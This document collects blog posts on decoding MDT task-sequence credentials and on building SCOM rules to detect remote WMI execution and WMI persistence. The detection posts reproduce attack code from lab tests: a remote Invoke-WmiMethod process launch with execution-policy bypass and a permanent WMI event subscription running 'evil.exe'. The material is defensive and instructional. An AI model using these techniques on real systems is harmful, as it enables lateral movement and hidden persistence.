Referencing Username and Password Credentials in an MDT Task Sequence

I don't usually write about MDT, and I don't plan on making this a habit either. However, I ran into an issue while doing some automation for a customer that I felt needed documentation. This is just as much for my own benefit as it is for the three people who may find it useful, but there wasn't much written about this online. Whenever I find myself in that situation, I usually turn it into a blog post, especially when the solution isn't intuitive.

First, to back up a bit: Microsoft Deployment Toolkit (MDT) is a free way of creating lite touch and zero touch deployments of operating system images across physical and/or virtual platforms. It's often paired with SCCM (which is not free). SCCM can provide more automation for these kinds of tasks and gets you around the problem that I'm describing here, but MDT can exist in a standalone environment, especially if System Center is too expensive to purchase. Even at MSFT we have uses for MDT in certain types of engagements, since it can automate some of the solutions we bring into a customer environment without needing to set up a System Center infrastructure.

In this particular case, we needed to make use of some of the variables in the MDT scripting environment. It's worth noting that there are a ton of variables available. A full list can be found in the variables.dat file that exists locally on the machine being built. This file is generated during deployment and removed once deployment is complete. I'm sure there's a place on the MDT server that houses a copy, but I never got that far, since the file was left behind whenever my task sequence failed. The long and short of it is that you can open this file in Notepad and see all of the variables available to you in a scripting environment.

From a scripting standpoint, these variables can be referenced within the script being executed by your task sequence, which gives you some very powerful automation options. The problem, as we discovered, is that some variables are not represented in clear text. As you can guess, this is typically username and password data. Both are in the variables.dat file, but not in readable form, as they are stored in base64. To be abundantly clear, nothing about this is secure. It's meant only to keep prying eyes from seeing usernames and passwords in clear text. Converting base64 back to ASCII is a single line of PowerShell, so whatever credentials you choose to put in MDT should have only the permissions required for the task at hand. Controlling physical access to your build environment is just as important, so keep that in mind as well.

To start, we need to load the TS environment. This is easy to do and not hard to find online:

$TSEnv = New-Object -ComObject Microsoft.SMS.TSEnvironment
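
As an aside, if you want to see everything the task sequence exposes without hunting down variables.dat, the same COM object can enumerate its own variables. A quick sketch; the output path is just my choice for illustration:

# Dump every task sequence variable and its value to a text file for inspection.
$TSEnv.GetVariables() | ForEach-Object { "$_ = $($TSEnv.Value($_))" } | Out-File -FilePath "$env:TEMP\TSVariables.txt"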

At this point, we need to reference the variable. In my case, I’m going to use the domain join account that someone specifies during the installation wizard. You do this as such:

$Username = $TSEnv.Value("OSDJOINACCOUNT")
$Password = $TSEnv.Value("OSDJOINPASSWORD")

$Domain = $TSEnv.Value("DOMAINNAME")

Again, that's pretty easy. The $Domain value is in clear text, so there's not much to it, but if you pull the OSDJOINACCOUNT and OSDJOINPASSWORD variables out of the variables.dat file, you'll see something non-readable. The hard work in my case was figuring out what that format was. My assumption was that it was hashed, like a typical password would be. That wasn't the case, and it took a lot of digging to find an offhand comment on Reddit that these values are actually base64. For a PowerShell professional this is pretty easy, but for those of us who don't breathe ISE, it's a bit more difficult. From there, you need this step:

$Password2 = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($Password))
$Username2 = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($Username))

Now we have the username and password in a format that the task sequence script can use. The rest is pretty standard: convert the password to a secure string and create a PowerShell credential object from it.

$CredPass = ConvertTo-SecureString $Password2 -AsPlainText -Force

$Credential = New-Object System.Management.Automation.PSCredential($Username2, $CredPass)

At this point, you have a credential that works, and whatever PowerShell command you’re trying to script that uses said credential can be given the $Credential variable.
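
For example, a domain join is the obvious use of these particular variables. A minimal sketch; the Add-Computer call is my own illustration, not necessarily how your task sequence step is built:

# Hypothetical usage: join the machine to the domain captured by the wizard,
# using the credential object assembled above.
Add-Computer -DomainName $Domain -Credential $Credential -ErrorAction Stop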

That’s it.

Don’t ask me how to do it in VBS. I have no plans on learning that. 

Security Monitoring Future Plans (May 2019)

The good news about this project is that we've been able to knock out a lot of low-hanging fruit that can detect some of the breadcrumbs an attacker leaves behind, as well as identify where legacy protocols are being used. The bad news is that most of that low-hanging fruit has been picked clean. This space will be used to identify and track future plans.

I'm going to stick with a one-year release cadence. This has been developed mostly by me on my own time, and as such there are only so many hours to go around. My current plans are as follows:

  • I would like to develop a monitoring component targeting administrative accounts. I'm not sure how easily this can be accomplished. Enumerating these accounts against a DC is not hard to do (see the sketch after this list), but in order to alert on them, the objects would need to be created on each and every DC, which isn't realistic from a performance standpoint. There's currently an unhosted class and a disabled discovery in this MP, but nothing is targeted against it. The hope is to come up with a way to start tracking admin accounts in general, logons outside of business hours, and so on.
  • I’m hoping to delve more into WMI monitoring with the next release.
  • There are a few rules that I could see re-writing to add overridable parameters.
  • Likely going to write some detection mechanisms around this SCOM vulnerability.
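
For what it's worth, the enumeration piece in the first bullet really is trivial; the hard part is targeting and alerting. A minimal sketch, assuming the ActiveDirectory module is available and that "Domain Admins" is the group of interest:

# Enumerate members of a privileged group against a DC (requires the RSAT ActiveDirectory module).
Import-Module ActiveDirectory
Get-ADGroupMember -Identity 'Domain Admins' -Recursive | Select-Object Name, SamAccountName, objectClass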

This is not a big list presently, but as time permits I hope to grow it. Any suggestions are always appreciated.

Security Monitoring Change Log May 2019

  • Updated Task Scheduler Creation Rule
  • Updated Service Creation on DC Rule
  • Disabled the alert rule for Batch Logon; a report captures this data instead. The rule is still present and can be re-enabled.
  • Created an override for the Local Account Creation rules on domain controllers. While this didn't appear in any of my testing, I was told that some security software can generate false positives for this rule on DCs. Since DCs don't have local accounts to begin with, I simply turned it off for them.
  • Fixed a bug with regsvr32 remote registration of DLL rule.
  • Added rules/discoveries associated with writeable locations in the OS. Note that there are three parts to this series.
  • Added a rule to detect attempts to kill Windows Defender.
  • Added collection rule and report for TLS usage.
  • Added rules for suspicious PowerShell usage. For instructions on overrides, please see the addendum.
  • Removed dependency on SQL MP.
  • Added rule for WMI Persistence.
  • Added rules for WMI Remoting.
  • Added a distributed application for monitoring audit settings (covered in detail below).
  • Added a timeout as an overridable parameter to the SMB1 collection rule. The specified timeout of 60 seconds was causing failures in my lab. I upped this value to 300 seconds as the default setting.
  • Turned off the registry monitor for WDigest settings. It is not needed on Server 2012/2016, and with Server 2008 going out of support, I've disabled it by default. The monitor is still present if someone wants to use it.

Security Monitoring: Using SCOM to Detect Remote WMI Attempts

Last week, I wrote about a WMI persistence attempt, where an attacker can use a WMI event subscription to effectively hide what amounts to a scheduled task inside WMI. Today, I'm going to talk about another use of WMI that was in Matt Graeber's paper: remoting. Legitimate remote WMI use will presumably happen from time to time in an environment, but I'm guessing it's fairly rare given the plethora of remote administration tools out there.

I started by borrowing the PowerShell code needed to accomplish this. As you can see, the code isn’t that difficult to write:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'powershell.exe -noexit -ExecutionPolicy Bypass -File \\scom1\new_share\badps.ps1' -ComputerName SQL1 -Credential 'nagau\nagau'

I essentially created a share on my SCOM server and used it to execute a PowerShell script remotely on my SQL server with my own credentials. A bad guy can do this too, though I'm going to assume they would use something a bit more sophisticated and would be passing the hash of a stolen account in some capacity. I'm not too worried about that at the moment; I'm more concerned with seeing what can be reliably detected. The WMI logs were unfortunately useless. However, there were some interesting events in the Security logs on both of the servers in question. On my source server, the following event was captured:

[Screenshot: Event ID 4648 from the Security log on the source server]

This is a standard logon/logoff event, and you'll see it pretty much every time something logs on to your system. On its own, that's going to be noisy, but with this kind of thing the devil is in the details, and I think the highlighted information has some clues that something is going on that shouldn't be. For one, this isn't a standard RUNAS, even though that's what the event ID implies. I tested a local RUNAS on the same system: it lists the account name you used, but the target is localhost, and the additional information field also says localhost. The process name is also telling here, being svchost. While it's not unusual to see svchost as a process, this event tells us that svchost is making a remote procedure call. It's probably worth noting that there was another 4648 on the same machine that gave a bit more information about what I was doing, but I'm not sure it has anything useful that I could alert off of.

[Screenshot: A second Event ID 4648 on the source server, showing the target server and PowerShell_ISE as the calling process]

We can see from that event that I'm targeting a remote server and that I'm using PowerShell_ISE to run the command, but ultimately an attacker will be using their own tools, and if I knew the name of said process, I could just target that. This particular event might be worth searching for if the first event appears.

On the remote host, I also saw another telling event; in this case it was the 4688 event that we routinely target:

[Screenshot: Event ID 4688 from the Security log on the remote host]

If you look closely, you'll notice that my PowerShell command bypassed my execution policy. That alert fired as expected, so I won't target it here. But the highlighted fields were also fairly unique for a typical 4688. You can see that WMI kicked off a PowerShell process, but under the context of the Network Service account rather than the System account you would typically see. The security ID is also the NULL SID, which seems to differ from other Network Service usages that generate 4688 events. As such, I'm going to try out two new rules to see just how unique these events are:

Rule 1 will target the Security log, looking for a 4648 event with parameter 10 containing RPCSS, parameter 9 not containing the computer name, and parameter 12 containing svchost.

Rule 2 will target the Security log, looking for a 4688 event with parameter 1 containing Network, parameter 10 containing NULL, and parameter 14 containing WmiPrvSE.exe.

Note: For this to work properly, the command line process auditing GPO MUST be set; otherwise, the parameter positions will not line up.
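
If you want to eyeball these events before building the SCOM rules, a rough manual check with Get-WinEvent is good enough. This is only a sketch that matches on the rendered event message rather than on the individual parameters the rules use:

# Rough manual check: recent 4648 events that reference both RPCSS and svchost.
# (The SCOM rule also requires that the target server is not the local machine; that part
# is easier to express against individual event parameters than against the message text.)
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4648 } -MaxEvents 500 |
    Where-Object { $_.Message -match 'RPCSS' -and $_.Message -match 'svchost' }

# Rough manual check: recent 4688 events where WmiPrvSE.exe spawned a process as Network Service.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 500 |
    Where-Object { $_.Message -match 'WmiPrvSE\.exe' -and $_.Message -match 'NETWORK' }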

I’ll let these bake and see if they make noise. Happy SCOMing.

Update 3/19 – SCOM can actually trigger one of these rules. That's not surprising on investigation, as SCOM will periodically restart the health service when it consumes too much CPU/RAM. Since my DC is chronically under-specced, I'm not surprised to find SCOM doing this. Anyway, I've updated the rule to exclude SCOM's own remote WMI attempts.

Using SCOM to detect WMI Persistence Attempts

I have to tip my hat to a colleague (Ian Smith) for pointing me to the paper that Matt Graeber did for Black Hat in 2015. It was an interesting read on how attackers can use WMI to do a number of things. I haven't done much work in the Security Monitoring MP with regard to WMI, so this seemed like some low-hanging fruit to attack. Step one was to figure out what I could detect, so I borrowed Matt's code to do some simple tests. For those who want to play along at home, here you go:

$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\evil.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ExecutablePath=$exePath; CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter; Consumer=$WMIEventConsumer}

This PowerShell basically creates what is known as a permanent WMI event subscription. Subscriptions, in and of themselves, are not bad things. Applications use them all the time to kick off processes under certain conditions, but unfortunately, an attacker can do this too. In this case, Matt was demonstrating how an attacker can create a subscription that executes a command line executable (evil.exe) once the system has been up between 200 and 320 seconds. I'm not terribly concerned with the query needed to trigger it. The big takeaway here is monitoring for the use of the CommandLineEventConsumer, as we can train SCOM to look for something useful.

That useful information was found in the WMI-Activity log with this event:

[Screenshot: Event ID 5861 from the Microsoft-Windows-WMI-Activity/Operational log]

The 5861 event that was generated appears to be fairly rare. I don't see it anywhere else in my lab, and the event description clearly lays out the code that I ran. As such, I have an easy set of criteria to search for:

Event Log = Microsoft-Windows-WMI-Activity/Operational

Event ID = 5861

Event Description contains “//./root/subscription” AND “CommandLineEventConsumer”
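
As a quick sanity check outside of SCOM, you can query the same log directly. A minimal sketch using the criteria above:

# Look for 5861 events that reference a CommandLineEventConsumer in root\subscription.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WMI-Activity/Operational'; Id = 5861 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'CommandLineEventConsumer' -and $_.Message -match '//\./root/subscription' }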

I’ll let this bake in my lab, and hopefully we will see this added to the next edition of Security Monitoring. Happy SCOMing.

Update 3/19 – This rule fires not only when the subscription is created, but also any time the conditions are met for it to run again. If you have something legitimately creating WMI subscriptions, you'll probably want to disable this rule for that particular machine. I did add suppression by logging computer, so you should only see a repeat count here. Simply investigate the cause, and if it's legit, override it. Beyond that, it has been very quiet.
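
One last housekeeping note: if you ran Matt's sample above in your own lab, you'll want to remove the test subscription afterwards. A minimal cleanup sketch, assuming the filter and consumer names from that sample:

# Remove the test subscription pieces created by the sample code above.
Get-WmiObject -Namespace 'root\subscription' -Class __FilterToConsumerBinding |
    Where-Object { $_.Filter -match 'BotFilter82' } | Remove-WmiObject
Get-WmiObject -Namespace 'root\subscription' -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject
Get-WmiObject -Namespace 'root\subscription' -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject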

Security Monitoring Distributed Application: Monitoring Audit Settings

One of the drawbacks to the current design of the Security Monitoring Management Pack that I felt needed to be improved was the reliance on the pre-canned GPOs that I provided with the documentation. The main issue is that these GPOs turn on a lot more auditing than the management pack actually monitors. That was largely intentional, since I needed auditing enabled to see what types of events are generated and to mine them for information worth alerting on. But it leads to a bit of a documentation mess: I note in the documentation for individual rules and monitors when a particular setting needs to be turned on, but that requires a lot of reading and surfing for management pack users, especially if they do not want to simply use the GPOs I provide… until now.

The first step was creating an audit policy monitor type to look at a server’s individual audit settings. I’ve documented that here.

With the help of Ian Smith and Kevin Justin, we were able to build out a distributed application that allows users to see whether the required audit settings are in place. We will also be incorporating some new views into the MP to make it easy to see which settings need to be adjusted. I'll address the new views in a future post. For now, let's cover the distributed application.

The DA is broken down by domain (there will be a distributed application for each domain in your forest). Each domain is further broken into two separate groups: domain controllers and member servers. The reason is fairly straightforward. Domain controllers, by default, are isolated in their own OU and typically have different auditing settings configured. Member servers are a bit more complicated, as in theory they can have different audit settings from one OU to the next. I'll cover that in more detail below.

For now, let's look at DCs. As you can see from the screenshot below, new monitors have been created for each audit configuration setting. For domain controllers, these are on by default. It's also worth noting that these monitors do not generate alerts; this was done to avoid unnecessary alerting. If too much state change is an issue in your environment, you may want to consider turning off any monitors for settings you have no plans of fixing. The individual monitors roll up to a dependency monitor (which uses a worst-of algorithm), so if any audit setting is not configured correctly on one domain controller, the dependency monitor should be yellow (see the screenshot below). Since DCs are all in the same OU, I would expect all of your DCs to be either yellow or green, though if there's an issue with GPO application, it's possible for this not to be the case. In the screenshot below, you'll see that the command line process auditing setting is not set correctly on my DC, and as such, the MP is not fully monitoring domain controllers in this lab. This particular monitor, for the record, looks at a registry key, though most of these monitors look at auditpol.exe results.

[Screenshot: Domain controller audit setting monitors rolling up to the dependency monitor, with command line process auditing unhealthy]
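
As an aside, you can spot check both kinds of settings manually on a DC. A minimal sketch; the subcategory name and the registry value for command line auditing are what I believe is being checked, but treat them as assumptions and verify against your own GPO:

# Check the advanced audit policy subcategory for process creation.
auditpol.exe /get /subcategory:"Process Creation"

# Check whether command line arguments are included in 4688 events (1 = enabled).
Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit' -Name 'ProcessCreationIncludeCmdLine_Enabled' -ErrorAction SilentlyContinue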

Member servers function in a similar capacity, though there are a few caveats. Member server monitoring is OFF by default, because these monitors would effectively be targeted at every server in the environment. That could generate a lot of state change data in a production environment and potentially cause performance issues with SCOM, not to mention cluttering up Health Explorer with a whole bunch of servers where one audit setting is not set correctly. There is one exception: member server auditing is enabled by default for your management servers, via an override within the Security Monitoring MP. As such, when you look at your member server monitoring, you'll see data from the management servers. If you have one audit policy per domain, as most environments typically do, then you're done; you really don't need to configure anything else. However, if you have audit settings set at the OU level and multiple OUs containing monitored servers, you may want to consider turning on these monitors for one server in each OU that has a different audit policy. You'll have to do this on a monitor-by-monitor basis, so I'd recommend creating a SCOM group containing the Windows Computer object for a single server from each OU and enabling the monitors for that group. In a smaller environment, you could simply turn this on for all Windows Computer objects, but I don't recommend that. Member server monitoring will look something like this out of the box:

[Screenshot: Member server audit setting monitors out of the box, with only the management server monitored]

You will see an enabled monitor for your management server, and everything else will show as not monitored. If your audit policies are determined at the domain level, you're done; this view will show you whether your audit settings are set correctly for DCs and member servers, and a DA will be enumerated for each domain that you are monitoring. You should ignore the not-monitored domain controllers, since they are covered by the domain controller audit settings discussed above; they appear here mostly because of how targeted classes roll up in SCOM. However, if you have customized your audit settings and set them by OU, you may need additional configuration and find it necessary to turn on these monitors for additional servers. In the example below, I turned on one of the monitors for my SQL server:

[Screenshot: An audit setting monitor enabled via override for an additional member server (the SQL server)]

This can be done via override. It's worth noting that you should really do this for each audit setting, which can be a bit tedious, and you may need to add more servers as new OUs are created. My recommendation would be to create a SCOM group in your unsealed overrides MP and do a one-time override against that group for each of these monitors. At that point, you can simply add servers to the group as needed.

Now to the downside. The biggest issue that I see with this is the need for agent proxy to be turned on. I've mentioned in previous articles that this is some sort of security feature, though I've yet to see any documentation as to what it mitigates. My best guess is a compromised agent potentially being used to submit bogus discovery data, though I'm not aware of any such threats or what an attacker would gain from it. Most of my customers simply turn this on for every agent by default. As it is, you most likely already have it on for your domain controllers if you use the AD Management Pack, along with a number of member servers, since it's required by the SQL and SharePoint Management Packs. If this is a big deal for you, then you probably don't want to turn on these discoveries, as that will trigger an agent proxy alert for whatever you turn on.
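
For reference, turning agent proxy on across the board is a quick job from the Operations Manager Shell. A sketch using the standard cmdlets (whether you want it on for every agent is, of course, your call):

# Enable agent proxy for any agent that doesn't already have it enabled.
Import-Module OperationsManager
Get-SCOMAgent | Where-Object { $_.ProxyingEnabled.Value -eq $false } | Enable-SCOMAgentProxy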

One other slight caveat is that I may choose to rewrite this to target Windows OS instead of Windows Computer. That’s not that big a deal, and I’ll update this article accordingly.